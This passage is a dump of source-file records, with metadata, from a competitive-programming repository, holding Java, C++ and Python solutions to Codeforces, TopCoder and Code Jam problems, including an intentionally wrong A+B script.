map.get(pair.p);\n if (e == null) {\n e = 0;\n }\n map.put(pair.p, e + pair.n);\n }\n }\n\n public void solve() {\n int n = in.nextInt();\n Map<Integer, Integer>[] a = new Map[n], b = new Map[n];\n\n for (int i = 0; i < n; i++) {\n a[i] = new HashMap<Integer, Integer>();\n b[i] = new HashMap<Integer, Integer>();\n\n int m = in.nextInt();\n List<Pair> p = fac(m - 1);\n List<Pair> q = fac(m - 0);\n\n mull(b[i], q);\n\n for (int j = 0; j < i; j++) {\n mull(a[j], p);\n mull(b[j], q);\n }\n }\n\n BigInteger[] p = new BigInteger[n * 1024], q = new BigInteger[n * 1024];\n\n for (int i = 0; i < n; i++) {\n if (a[i].containsKey(0)) {\n out.println(\"0/1\");\n } else {\n int ps = 1, qs = 1;\n p[0] = q[0] = BigInteger.ONE;\n\n for (Entry<Integer, Integer> entry : a[i].entrySet()) {\n Integer be = b[i].get(entry.getKey());\n if (be == null) {\n be = 0;\n }\n\n int ae = entry.getValue();\n\n int m = Math.min(ae, be);\n\n if (m != ae) {\n p[ps++] = BigInteger.valueOf(entry.getKey())\n .pow(ae - m);\n }\n\n if (m != be) {\n b[i].put(entry.getKey(), be - m);\n } else {\n b[i].remove(entry.getKey());\n }\n }\n\n for (Entry<Integer, Integer> entry : b[i].entrySet()) {\n q[qs++] = BigInteger.valueOf(entry.getKey()).pow(\n entry.getValue());\n }\n\n mull(p, ps);\n mull(q, qs);\n\n out.print(p[0]);\n out.print('/');\n out.print(q[0]);\n out.println();\n }\n }\n\n }\n\n public void run() {\n try {\n if (taskName == null) {\n in = new FastScanner(null);\n out = new PrintWriter(System.out);\n\n } else {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n\n }\n\n solve();\n\n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n\n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n\n FastScanner(File f) {\n try {\n if (f == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } else {\n br = new BufferedReader(new FileReader(f));\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n\n long nextLong() {\n return Long.parseLong(next());\n }\n\n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n\n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n\n public static void main(String[] arg) {\n new D().run();\n }\n}\n" }, { "alpha_fraction": 0.5426127910614014, "alphanum_fraction": 0.5656148791313171, "avg_line_length": 32.90999984741211, "blob_id": "38a876f889d31ad60a04f6f925300480bc1becd0", "content_id": "5f335ba3c7729fd6353de76a3265bf64611736cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3391, "license_type": "no_license", "max_line_length": 174, "num_lines": 100, "path": "/CodeForce/1515/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, l, r);\n vi a(n);\n readln(a);\n if (l > r)\n swap(l, r),\n reverse(all(a));\n //[LEFT || RIGHT ]\n //[c1, c2, c3, c4 || c5, c6, c7, c8, c9, ..., cn]\n //[1, 1 || 2, 2]\n map<int, int> left;\n map<int, int> right;\n fori(n)\n if (i < l)\n left[a[i]]++;\n else\n right[a[i]]++;\n int ans = 0;\n int oddLeft = 0;\n int oddRight = 0;\n int canLeft = 0;\n int canRight = 0;\n for (auto& [color, count]: right)\n {\n int eq = min(left[color], count);\n count -= eq;\n left[color] -= eq; //No action\n canRight += count / 2; //Change parity\n oddRight += count;\n }\n for (auto& [color, count]: left)\n {\n canLeft += count / 2; //Change parity\n oddLeft += count;\n }\n //odd == change color and parity\n int odd = min(oddLeft, oddRight);\n oddLeft -= odd;\n oddRight -= odd;\n oddLeft = clamp(oddLeft - canLeft, oddLeft / 2, oddLeft);\n oddRight = clamp(oddRight - canRight, oddRight / 2, oddRight);\n writeln(ans + odd + oddLeft + oddRight);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.510948896408081, "alphanum_fraction": 0.5474452376365662, "avg_line_length": 16, "blob_id": "0f2fc6262d17dee9e5c2a86d17d6efcf035d0664", "content_id": "ac5db5b493b9227b61ad4576d49e5a52a7adff1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 137, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/scripts/A+B/A+B_WA2.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import random\n\na, b = map(int, input().split())\nprint(a + b)\nif random.randint(0, 10) == 0:\n print(a - b + 1)\nelse:\n print(a - b)\n\n" }, { "alpha_fraction": 0.47012898325920105, "alphanum_fraction": 0.4881194829940796, "avg_line_length": 26.532711029052734, "blob_id": "adca6fc580a853ca19a44ed4851659f636d047b8", "content_id": "f4312027f884e67c6f2ec2248f693d924cc8daf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5892, "license_type": "no_license", "max_line_length": 174, "num_lines": 214, "path": "/CodeForce/1744/E1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//binSearch\n//x \\in [l, r]-> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n\n//sieve\nvector<bool> sieve(int n)\n{\n vector<bool> x(n, true);\n x[0] = x[1] = false;\n for (int i = 2; i < n; i++)\n if (x[i])\n for (int j = i * 2; j < n; j += i)\n x[j] = false;\n return x;\n}\n\n//linearSieve\nstruct linearSieve\n{\n vector<int> primes;\n vector<int> mobius;\n vector<int> minPrime, prev;\n\n linearSieve(int N)\n {\n minPrime.resize(N, 0);\n prev.resize(N, 0);\n mobius.resize(N, 0);\n mobius[1] = 1;\n for (int i = 2; i < N; i++)\n {\n if (minPrime[i] == 0)\n mobius[i] = -1,\n primes.push_back(i),\n minPrime[i] = i;\n for (int prime : primes)\n {\n int temp = prime * i;\n if (temp < N && prime <= minPrime[i])\n minPrime[temp] = prime,\n mobius[temp] = minPrime[i] == prime ? 0 : -mobius[i],\n prev[temp] = i;\n else\n break;\n }\n }\n }\n\n vector<pair<int, int>> foldedFactorization(int x)\n {\n vector<pair<int, int>> temp;\n int p = -1;\n int pp = -1;\n while (x > 1)\n {\n pp = p;\n p = minPrime[x];\n if (p != pp)\n temp.pb({p, 1});\n else\n temp.back().second++;\n x = prev[x];\n }\n return temp;\n }\n\n vector<int> divisors(int x, bool nonTrivial = true)\n {\n vector<int> ans;\n\n const vector<pair<int, int>>& fold = foldedFactorization(x);\n function<void(int, int)> gen = [&](int v, int j) {\n if (j == int(fold.size()))\n {\n if (!nonTrivial || (v != 1 && v != x))\n ans.pb(v);\n return;\n }\n gen(v, j + 1);\n fori(fold[j].second)\n gen(v *= fold[j].first, j + 1);\n };\n gen(1, 0);\n\n return ans;\n }\n\n vector<int> sortedDivisors(int x, bool nonTrivial = true)\n {\n vector<int> ans = divisors(x, nonTrivial);\n sort(ans.begin(), ans.end());\n return ans;\n }\n\n vector<int> factorization(int x)\n {\n vector<int> temp;\n while (x > 1)\n temp.push_back(minPrime[x]),\n x = prev[x];\n return temp;\n }\n\n map<int, int> mapFactorization(int x)\n {\n map<int, int> m;\n while (x > 1)\n ++m[minPrime[x]],\n x = prev[x];\n return m;\n }\n\n bool isPrime(int x)\n {\n return minPrime[x] == x;\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(a, b, c, d);\n auto s = linearSieve(100010);\n auto fa = s.mapFactorization(a);\n auto fb = s.mapFactorization(b);\n for (auto& [k, v]: fb)\n fa[k] += v;\n for (int x = a + 1; x <= c; ++x)\n {\n auto fx = s.mapFactorization(x);\n auto fy(fa);\n ll y = 1;\n for (auto& [k, v]: fx)\n fy[k] -= v;\n\n for (auto& [k, v]: fy)\n forj(v)\n y *= k;\n if (y > d)\n continue;\n auto yy = y * binSearch(1ll, 1000000001ll, [&](ll mul) {\n return y * mul > b;\n });\n if (yy > b && yy <= d)\n return writeln(x, yy);\n }\n writeln(-1, -1);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.30790191888809204, "alphanum_fraction": 0.3419618606567383, "avg_line_length": 17.83333396911621, "blob_id": "91b874e87241f8eec87104638de8942b105a4e88", "content_id": "093ffd303e5dcd929bd9fdd4d8c0e98b42911c24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1468, "license_type": "no_license", "max_line_length": 44, "num_lines": 78, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.14/J.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <stack>\n#include <cstdio>\n#include <vector>\n#include <algorithm>\n \nusing namespace std;\n \nlong long res = 0, ost = 0;\n \nint inf = 1e+9 + 9;\n \nint pow (int x, int k){\n long long res = 1;\n for (int i = 0; i < k; ++i){\n res *= x;\n if (res >= inf)\n return inf;\n }\n int c = res;\n return c;\n}\n \nint next(int x, int k){\n int l = 1;\n int r = x + 1;\n int m = (l + r) / 2;\n while (r > l + 1){\n m = (r + l) / 2;\n if (pow(m, k) > x)\n r = m;\n else\n l = m;\n }\n res = l;\n}\n \nint sz[100500];\nint dp[100500];\nint ans[100500];\n \n \nint n;\nint main(){\n freopen(\"cube.in\", \"r\", stdin);\n freopen(\"cube.out\", \"w\", stdout);\n cin >> n;\n for (int k = 2; k <= 10; ++k){\n sz[0] = 0;\n dp[0] = 0;\n ans[0] = 0;\n sz[1] = 1;\n dp[1] = 1;\n ans[1] = 1;\n \n for (int i = 2; i <= n; ++i){\n sz[i] = inf;\n int cr = next(i, k);\n for (int j = 1; j <= cr; ++j){\n int gg = pow(j, k);\n if (sz[i - gg] + 1 < sz[i]){\n sz[i] = sz[i - gg] + 1;\n dp[i] = i - gg;\n ans[i] = j;\n }\n }\n }\n \n cout << sz[n] << \" \";\n int q = n;\n for (int i = 0; i < sz[n]; ++i){\n cout << ans[q] << \" \";\n q = dp[q];\n }\n cout << endl;\n \n }\n}" }, { "alpha_fraction": 0.31166666746139526, "alphanum_fraction": 0.3683333396911621, "avg_line_length": 16.617647171020508, "blob_id": "97108c8a86c52223a353fd8fec838c631e0ee665", "content_id": "347a5d99dd3209cbec4b6b7d299c3e2a16cc8675", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 600, "license_type": "no_license", "max_line_length": 50, "num_lines": 34, "path": "/CodeForce/0952/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\n\nsoft = 0\nhard = 0\n\nfor i in range(n):\n _, t = input().split()\n if t == 'soft':\n soft += 1\n else:\n hard += 1\n\nfor i in range(1, 100):\n # field1 = [[0] * i for j in range(i)]\n # field2 = [[0] * i for j in range(i)]\n\n s1 = soft\n h1 = hard\n\n s2 = soft\n h2 = hard\n\n for j in range(i):\n for k in range(i):\n if (j + k) % 2 == 0:\n s1 -= 1\n h2 -= 1\n else:\n s2 -= 1\n h1 -= 1\n\n if s1 <= 0 and h1 <= 0 or s2 <= 0 and h2 <= 0:\n print(i)\n break\n\n" }, { "alpha_fraction": 0.442945271730423, "alphanum_fraction": 0.45952197909355164, "avg_line_length": 33.818790435791016, "blob_id": "26d1d52f15dff9f422d1eab0e647e1e228f35ce3", "content_id": "3302edfdb693d2ffb83309f8bc91e34169512ab7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5188, "license_type": "no_license", "max_line_length": 174, "num_lines": 149, "path": "/2020/gcj1B/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(a.size())\n\ntypedef pair<short, short> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//printTuple\ntemplate<class Tuple, size_t... Is> ostream& print_tuple(ostream& os, const Tuple& t, index_sequence<Is...>) { ((os << (Is == 0 ? \"\" : \" \") << get<Is>(t)), ...); return os; }\ntemplate<class Tuple, size_t... Is> istream& read_tuple(istream& is, Tuple& t, index_sequence<Is...>) { ((is >> get<Is>(t)), ...); return is; }\ntemplate<class... Args> inline ostream& operator<<(ostream& os, const tuple<Args...>& t) { return print_tuple(os, t, index_sequence_for<Args...>{}); }\ntemplate<class... Args> inline istream& operator>>(istream& is, tuple<Args...>& t) { return read_tuple(is, t, index_sequence_for<Args...>{}); }\n\n//}}}\n\nvector<pii> run()\n{\n ints(r, s);\n int n = r * s;\n vector<pii> a;\n if (r == 2)\n {\n for (int i = 2; i < n; i += 2)\n a.pb({i, 1});\n return a;\n }\n if (s == 2)\n {\n if (r % 2 == 1)\n {\n a.pb({1, r - 1});\n for (int i = r; i < n - 2; i += 2)\n a.pb({2, i});\n }\n else\n {\n for (int i = r - 1; i < n - 2; i += 2)\n a.pb({2, i});\n }\n return a;\n }\n fori(n)\n a.pb({i % r, i % s});\n\n auto isCorrect = [&](const vector<pii>& x) {\n fori1(n)\n if (x[i].first < x[i - 1].first)\n return false;\n return true;\n };\n vector<tuple<int, vector<pii>, vector<pii>>> states = {{0, a, {}}}, nn;\n while (true)\n {\n nn.clear();\n for (auto& state: states)\n {\n int s = get<0>(state);\n auto moves = get<2>(state);\n auto x = get<1>(state);\n if (isCorrect(x))\n return moves;\n if (s == 0)\n for (int a = 1; a < n; ++a)\n for (int b = 1; a + b < n; ++b)\n {\n moves.pb({a, b});\n vector<pii> y;\n fori(b)\n y.pb(x[a + i]);\n fori(a)\n y.pb(x[i]);\n fori(n - a - b)\n y.pb(x[a + b + i]);\n nn.pb({a + b + 2, y, moves});\n moves.pop_back();\n }\n else\n for (int a = 1; a < min(n, s); ++a)\n {\n int b = min(n, s) - a;\n moves.pb({a, b});\n vector<pii> y;\n fori(b)\n y.pb(x[a + i]);\n fori(a)\n y.pb(x[i]);\n fori(n - a - b)\n y.pb(x[a + b + i]);\n nn.pb({a + b + 2, y, moves});\n moves.pop_back();\n }\n }\n states = nn;\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t);\n fori(t)\n {\n cout << \"Case #\" << (i + 1) << \": \";\n auto v = run();\n writeln(SZ(v));\n writeln(v);\n }\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4926566183567047, "alphanum_fraction": 0.5088306665420532, "avg_line_length": 30.403614044189453, "blob_id": "5de528146b839549fec5475c7b833ca69151bfda", "content_id": "7121f1720c6522af82d8dce9f913377d81cbf700", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5379, "license_type": "no_license", "max_line_length": 165, "num_lines": 166, "path": "/CodeForce/0672/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\r\n#include <bits/stdc++.h>\r\n\r\nusing namespace std;\r\n\r\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\r\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\r\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\r\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\r\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\r\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\r\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\r\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\r\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\r\n\r\n#define ll long long\r\n#define pb push_back\r\n#define vi vector<int>\r\n#define pii pair<int, int>\r\n#define vll vector<long long>\r\n#define pll pair<long long, long long>\r\n#define whole(a) a.begin(), a.end()\r\n#define next next__\r\n#define prev prev__\r\n#define count count__\r\n#define argmax(a) (max_element(whole(a)) - (a).begin())\r\n\r\n#define ints(a...) int a; readln(a)\r\n#define lls(a...) ll a; readln(a)\r\n#define wr(args...) err(split(#args,',').begin(),args)\r\n \r\n#define FILENAME \"input\"\r\n#define INF 1000000007\r\n \r\n#define tthti template<typename Head, typename... Tail> inline\r\n#define ttt12i template<typename T1, typename T2> inline\r\n#define ttti template<typename T> inline\r\n\r\ninline void writeln2(){cout<<\"\\n\";}\r\ninline void writeln() {cout<<\"\\n\";}\r\ninline void readln() {}\r\nttti void read(T&);\r\nttti void priws(T);\r\nttti void print(T);\r\n\r\nvoid err(vector<string>::iterator it){++it;}\r\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\r\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\r\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\r\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\r\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\r\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\r\n\r\n///-------------------------------------------------------------------------------------------------------------------------------------\r\n//Igorjan\r\n\r\n#define point pair<long double, long double>\r\n\r\nvoid run()\r\n{\r\n ints(ax, ay, bx, by, tx, ty, n);\r\n\tvector<point> a(n);\r\n vector<long double> dists(n, 0.0), as(n, 0.0), bs(n, 0.0);\r\n\treadln(a);\r\n auto dist = [&](point x, long double tx, long double ty) {\r\n return sqrt((x.first - tx) * (x.first - tx) + (x.second - ty) * (x.second - ty));\r\n };\r\n auto argmin = [&](vector<long double>& a) {\r\n auto mn = numeric_limits<long double>::max();\r\n int index = -1;\r\n fori(a.size())\r\n //if (a[i] < dists[i])\r\n if (a[i] - dists[i] < mn)\r\n index = i,\r\n mn = a[i] - dists[i];\r\n return index;\r\n };\r\n if (a.size() == 1)\r\n {\r\n cout.precision(15);\r\n cout << fixed << dist(a[0], tx, ty) + min(dist(a[0], ax, ay), dist(a[0], bx, by)) << \"\\n\";;\r\n return;\r\n }\r\n fori(n)\r\n dists[i] = dist(a[i], tx, ty),\r\n as[i] = dist(a[i], ax, ay),\r\n bs[i] = dist(a[i], bx, by);\r\n long double ans = accumulate(whole(dists), 0.0) * 2; \r\n\r\n int ma = argmin(as);\r\n int mb = argmin(bs);\r\n long double da = as[ma] - dists[ma];\r\n long double db = bs[mb] - dists[mb];\r\n\r\n if (ma != mb)\r\n {\r\n if (da <= 0)\r\n ans += da;\r\n if (db <= 0)\r\n ans += db;\r\n if (da >= 0 && db >= 0)\r\n ans += min(da, db);\r\n }\r\n else\r\n {\r\n int m = ma;\r\n dists.erase(dists.begin() + m);\r\n as.erase(as.begin() + m);\r\n bs.erase(bs.begin() + m);\r\n ma = argmin(as);\r\n mb = argmin(bs);\r\n long double da2 = as[ma] - dists[ma];\r\n long double db2 = bs[mb] - dists[mb];\r\n ans += min(da + (db2 >= 0 ? 0 : db2), db + (da2 >= 0 ? 0 : da2));\r\n }\r\n cout.precision(15);\r\n cout << fixed << ans << \"\\n\";\r\n}\r\n\r\nint main()\r\n{\r\n#ifndef ONLINE_JUDGE\r\n double time = clock();\r\n#endif\r\n ios_base::sync_with_stdio(false);\r\n// freopen(FILENAME\".in\", \"r\", stdin);\r\n// freopen(FILENAME\".out\", \"w\", stdout);\r\n run();\r\n#ifndef ONLINE_JUDGE\r\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\r\n#endif\r\n return 0;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#define a _a\r\n#define n _n\r\nttti ostream&operator<<(ostream&os,vector<T>&a);\r\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\r\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\r\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\r\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\r\nttti void print(T a){cout<<\" \"<<a;}\r\nttti void priws(T a){cout<<a;}\r\nttti void read(T& a){cin>>a;}\r\n" }, { "alpha_fraction": 0.3723554313182831, "alphanum_fraction": 0.38928067684173584, "avg_line_length": 26.623376846313477, "blob_id": "34f4633b01eafe70baa47459de1b31b17174feb5", "content_id": "b8860162735313a3cdc12f5e82f82fbf91ba5ced", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2127, "license_type": "no_license", "max_line_length": 82, "num_lines": 77, "path": "/TopCoder/TC652/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 December 2014\n#include <bits/stdc++.h>\n\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n\n#define fst first\n#define cnd second\n#define pb push_back\n#define ll long long\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int> >\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n\nusing namespace std;\n\n#define method vector <int> findPath(vector <int> x, vector <int> y)\n#define classname NoRightTurnDiv2\n\nbool ori(int x1, int y1, int x2, int y2, int x3, int y3)\n{\n return (x2 * y3 - x3 * y2 - x1 * y3 + x3 * y1 + x1 * y2 - x2 * y1) > 0;\n}\n\nclass classname\n{\n public :\n method\n {\n int n = x.size();\n vector<bool> used(n, false);\n vector<int> ans;\n pair<int, int> mn = {x[0], y[0]};\n int cur = 0;\n fori(n)\n if (i)\n if (mn > make_pair(x[i], y[i]))\n mn = {x[i], y[i]},\n cur = i;\n used[cur] = true;\n ans.push_back(cur);\n for (int i = 1; i < n; i++)\n {\n for (int j = 0; j < n; j++)\n if (!used[j])\n {\n bool ok = true;\n for (int k = 0; k < n; k++)\n if (!used[k] && k != j)\n ok &= ori(x[cur], y[cur], x[j], y[j], x[k], y[k]);\n if (ok)\n {\n cur = j;\n ans.push_back(cur);\n used[cur] = true;\n break;\n }\n }\n }\n return ans;\n }\n};\n\n#ifndef ONLINE_JUDGE\n#include \"../../writeln.h\"\n\nint main()\n{\n classname x;\n vector<int> a, b;\n readln(a, b);\n writeln(x.findPath(a, b));\n}\n#endif\n" }, { "alpha_fraction": 0.3362068831920624, "alphanum_fraction": 0.5431034564971924, "avg_line_length": 15.571428298950195, "blob_id": "1b5629c655503fee19a74a1e79a9abc6b5e4457c", 